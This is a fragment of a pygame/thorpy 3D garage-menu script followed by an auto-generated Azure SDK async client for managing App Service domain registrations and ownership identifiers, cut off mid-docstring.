self.e_back = thorpy.make_button("Return to garage", return_garage)
self.e_back.stick_to(self.e_ok, "left", "right")
self.e_back.move((-20,0))
self.e_bckgr.add_elements([self.e_back])
if not results:
reaction = thorpy.Reaction(pygame.MOUSEMOTION, self.mousemotion)
self.e_bckgr.add_reaction(reaction)
m = thorpy.Menu(self.e_bckgr)
m.play()
def derotate(self):
pass
## for e in self.vessels:
## e.rotate_around_center_y(-self.i)
## if self.displayed_vessel:
## self.displayed_vessel.rotate_around_center_y(-self.i)
## self.i = 0
def refresh_display(self):
self.viewport.fill(self.viewport_color)
if self.displayed_vessel:
self.displayed_vessel.rotate_around_center_y(1)
self.displayed_vessel.refresh_and_draw(self.cam,self.light)
else:
for v in self.vessels:
v.rotate_around_center_y(1)
v.refresh_and_draw(self.cam,self.light)
if self.trophy:
self.trophy.rotate_around_center_y(1)
self.trophy.refresh_and_draw(self.cam, self.light)
self.screen.blit(self.viewport,self.viewport_rect)
pygame.display.update(self.viewport_rect)
self.i += 1
def mousemotion(self,e):
if self.viewport_rect.collidepoint(pygame.mouse.get_pos()):
thorpy.change_cursor(thorpy.constants.CURSOR_BROKEN)
if pygame.mouse.get_pressed()[0]:
dcx = e.pos[0] - self.viewport_rect.centerx#parameters.W//2
dcy = e.pos[1] - self.viewport_rect.centery#parameters.H//2
dist = dcx*dcx + dcy*dcy
k = -1.
#a*rotate_z + (1-a)*rotate_x = k*rel.y
#rotate_y = k*rel.x
#dist grand : a grand
a = dist / float(parameters.W//2)**2
rotate_z = a * k * e.rel[1]
rotate_x = (1.-a) * k * e.rel[1]
rotate_y = k * e.rel[0]
if self.displayed_vessel:
self.displayed_vessel.rotate_around_center_x(rotate_x)
self.displayed_vessel.rotate_around_center_y(rotate_y)
self.displayed_vessel.rotate_around_center_z(rotate_z)
else:
thorpy.change_cursor(thorpy.constants.CURSOR_NORMAL)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._domains_operations import build_check_availability_request, build_create_or_update_ownership_identifier_request, build_create_or_update_request_initial, build_delete_ownership_identifier_request, build_delete_request, build_get_control_center_sso_request_request, build_get_ownership_identifier_request, build_get_request, build_list_by_resource_group_request, build_list_ownership_identifiers_request, build_list_recommendations_request, build_list_request, build_renew_request, build_update_ownership_identifier_request, build_update_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DomainsOperations:
"""DomainsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2020_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def check_availability(
self,
identifier: "_models.NameIdentifier",
**kwargs: Any
) -> "_models.DomainAvailabilityCheckResult":
"""Check if a domain is available for registration.
Description for Check if a domain is available for registration.
:param identifier: Name of the domain.
:type identifier: ~azure.mgmt.web.v2020_09_01.models.NameIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainAvailabilityCheckResult, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainAvailabilityCheckResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainAvailabilityCheckResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(identifier, 'NameIdentifier')
request = build_check_availability_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.check_availability.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainAvailabilityCheckResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/checkDomainAvailability'} # type: ignore
@distributed_trace
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.DomainCollection"]:
"""Get all domains in a subscription.
Description for Get all domains in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainCollection or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.DomainCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/domains'} # type: ignore
@distributed_trace_async
async def get_control_center_sso_request(
self,
**kwargs: Any
) -> "_models.DomainControlCenterSsoRequest":
"""Generate a single sign-on request for the domain management portal.
Description for Generate a single sign-on request for the domain management portal.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainControlCenterSsoRequest, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainControlCenterSsoRequest
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainControlCenterSsoRequest"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_control_center_sso_request_request(
subscription_id=self._config.subscription_id,
template_url=self.get_control_center_sso_request.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainControlCenterSsoRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_control_center_sso_request.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/generateSsoRequest'} # type: ignore
@distributed_trace
def list_recommendations(
self,
parameters: "_models.DomainRecommendationSearchParameters",
**kwargs: Any
) -> AsyncIterable["_models.NameIdentifierCollection"]:
"""Get domain name recommendations based on keywords.
Description for Get domain name recommendations based on keywords.
:param parameters: Search parameters for domain name recommendations.
:type parameters: ~azure.mgmt.web.v2020_09_01.models.DomainRecommendationSearchParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NameIdentifierCollection or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.NameIdentifierCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NameIdentifierCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
_json = self._serialize.body(parameters, 'DomainRecommendationSearchParameters')
request = build_list_recommendations_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.list_recommendations.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
_json = self._serialize.body(parameters, 'DomainRecommendationSearchParameters')
request = build_list_recommendations_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("NameIdentifierCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_recommendations.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/listDomainRecommendations'} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DomainCollection"]:
"""Get all domains in a resource group.
Description for Get all domains in a resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainCollection or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.DomainCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> "_models.Domain":
"""Get a domain.
Description for Get a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Domain, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.Domain
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.Domain",
**kwargs: Any
) -> "_models.Domain":
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain, 'Domain')
request = build_create_or_update_request_initial(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Domain', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.Domain",
**kwargs: Any
) -> AsyncLROPoller["_models.Domain"]:
"""Creates or updates a domain.
Description for Creates or updates a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param domain: Domain registration information.
:type domain: ~azure.mgmt.web.v2020_09_01.models.Domain
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Domain or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.web.v2020_09_01.models.Domain]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
domain_name=domain_name,
domain=domain,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def delete(
self,
resource_group_name: str,
domain_name: str,
force_hard_delete_domain: Optional[bool] = None,
**kwargs: Any
) -> None:
"""Delete a domain.
Description for Delete a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param force_hard_delete_domain: Specify :code:`<code>true</code>` to delete the domain
immediately. The default is :code:`<code>false</code>` which deletes the domain after 24 hours.
:type force_hard_delete_domain: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
force_hard_delete_domain=force_hard_delete_domain,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def update(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.DomainPatchResource",
**kwargs: Any
) -> "_models.Domain":
"""Creates or updates a domain.
Description for Creates or updates a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param domain: Domain registration information.
:type domain: ~azure.mgmt.web.v2020_09_01.models.DomainPatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Domain, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.Domain
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain, 'DomainPatchResource')
request = build_update_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Domain', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace
def list_ownership_identifiers(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DomainOwnershipIdentifierCollection"]:
"""Lists domain ownership identifiers.
Description for Lists domain ownership identifiers.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainOwnershipIdentifierCollection or the result
of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifierCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifierCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_ownership_identifiers_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.list_ownership_identifiers.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_ownership_identifiers_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainOwnershipIdentifierCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_ownership_identifiers.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers'} # type: ignore
@distributed_trace_async
async def get_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Get ownership identifier for domain.
Description for Get ownership identifier for domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
template_url=self.get_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def create_or_update_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
domain_ownership_identifier: "_models.DomainOwnershipIdentifier",
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Creates an ownership identifier for a domain or updates identifier details for an existing
identifier.
Description for Creates an ownership identifier for a domain or updates identifier details for
an existing identifier.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:param domain_ownership_identifier: A JSON representation of the domain ownership properties.
:type domain_ownership_identifier: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain_ownership_identifier, 'DomainOwnershipIdentifier')
request = build_create_or_update_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def delete_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
**kwargs: Any
) -> None:
"""Delete ownership identifier for domain.
Description for Delete ownership identifier for domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
template_url=self.delete_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def update_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
domain_ownership_identifier: "_models.DomainOwnershipIdentifier",
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Creates an ownership identifier for a domain or updates identifier details for an existing
identifier.
Description for Creates an ownership identifier for a domain or updates identifier details for
an existing identifier.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:param domain_ownership_identifier: A JSON representation of the domain ownership properties.
:type domain_ownership_identifier: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
